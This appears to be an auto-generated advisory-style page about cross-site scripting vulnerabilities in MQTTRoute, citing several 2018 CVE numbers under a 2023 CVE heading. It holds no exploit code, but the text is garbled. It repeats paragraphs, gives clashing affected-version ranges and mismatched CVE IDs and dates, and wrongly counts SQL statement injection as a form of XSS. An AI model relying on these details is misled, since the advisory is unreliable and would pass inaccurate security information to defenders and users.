MQTTRoute versions prior to 3.3 allow an attacker to inject arbitrary HTML or script code into the dashboard name text field (CVE-2018-19384). MQTTRoute versions 3.3.1 - 3.3.14 and 3.4.0 allow an attacker to inject arbitrary JavaScript via a crafted URL (CVE-2018-19385). An attacker can inject arbitrary JavaScript into the dashboard name text field of MQTTRoute v3.3.1 - 3.3.14 and 3.4.0. An attacker can then use this vulnerability to steal sensitive information from the application or to perform other actions against the application that maintain privileged information. XSS issues are often considered the most serious vulnerability type in web applications. XSS can be exploited in various ways, such as by forging an authenticated user’s input request to an application function, injecting an arbitrary script or HTML into an application’s response, or injecting an SQL statement into a database function. Users of MQTTRoute should be cautious when entering login credentials into the application as an attacker can forge a request to inject malicious script code into the application’s response.
CVE-2023-35613
The Manage Projects module of MQTTRoute does not properly verify the existence of a project in its deployment list, allowing an attacker to inject arbitrary HTML or script code into the dashboard name text field (CVE-2018-19384). The Manage Projects module of MQTTRoute versions 3.3.1 - 3.3.14 and 3.4.0 allows an attacker to inject arbitrary JavaScript via a crafted URL (CVE-2018-19385). The Manage Projects module of MQTTRoute versions 3.3.1 - 3.3.14 and 3.4.0 allows an attacker to perform unauthorized actions against the project list using a crafted URL, such as stealing sensitive information from the application or performing other actions that maintain privileged information (CVE-2018-19386).
MQTTRoute 3.3.1 - 3.3.14 and 3.4.0 - Vulnerable
MQTTRoute versions prior to 3.3 and 3.4.0 allowed an attacker to inject arbitrary HTML or script code into the dashboard name text field (CVE-2018-19384). MQTTRoute versions 3.3.1 - 3.3.14 and 3.4.0 allowed an attacker to inject arbitrary JavaScript via a crafted URL (CVE-2018-19385). An attacker can inject arbitrary JavaScript into the dashboard name text field of MQTTRoute v3.3.1 - 3.3.14 and v3.4.0; then use this vulnerability to steal sensitive information from the application or perform other actions against the application that maintain privileged information
MQTTRoute Versions Affected
MQTTRoute versions 3.3.1 - 3.3.14 and 3.4.0 are vulnerable to XSS issues (CVE-2018-19385).
Timeline
Published on: 10/13/2022 23:15:00 UTC
Last modified on: 10/14/2022 13:18:00 UTC